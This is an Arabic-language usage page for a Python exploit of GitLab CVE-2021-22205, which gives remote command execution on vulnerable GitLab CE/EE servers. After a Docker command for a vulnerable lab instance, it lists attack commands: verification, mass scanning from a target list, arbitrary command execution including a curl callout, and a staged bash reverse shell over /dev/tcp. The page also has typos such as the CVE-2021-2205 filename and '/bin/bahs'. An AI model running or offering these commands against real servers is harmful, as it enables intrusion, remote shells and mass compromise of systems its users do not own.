
استغلال Python لثغرة GitLab CVE-2021-22205، يتيح تنفيذ الأوامر عن بُعد وقذائف عكسية على إصدارات GitLab CE/EE المعرضة للخطر. يتضمن خيارات الفحص الجماعي وتنفيذ الأوامر.
تم اكتشاف مشكلة في GitLab CE/EE تؤثر على جميع الإصدارات بدءًا من 11.9. لم يكن GitLab يتحقق بشكل صحيح من ملفات الصور التي يتم تمريرها إلى محلل ملفات، مما أدى إلى تنفيذ أوامر عن بُعد.
export GITLAB_HOME=/srv/gitlab
sudo docker run --detach \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 \
--name gitlab \
--restart always \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
gitlab/gitlab-ce:13.9.1-ce.0
python3 CVE-2021-2205.py

python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"


python3 CVE-2021-2205.py -s true -f target.txt

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"


python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"


python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"
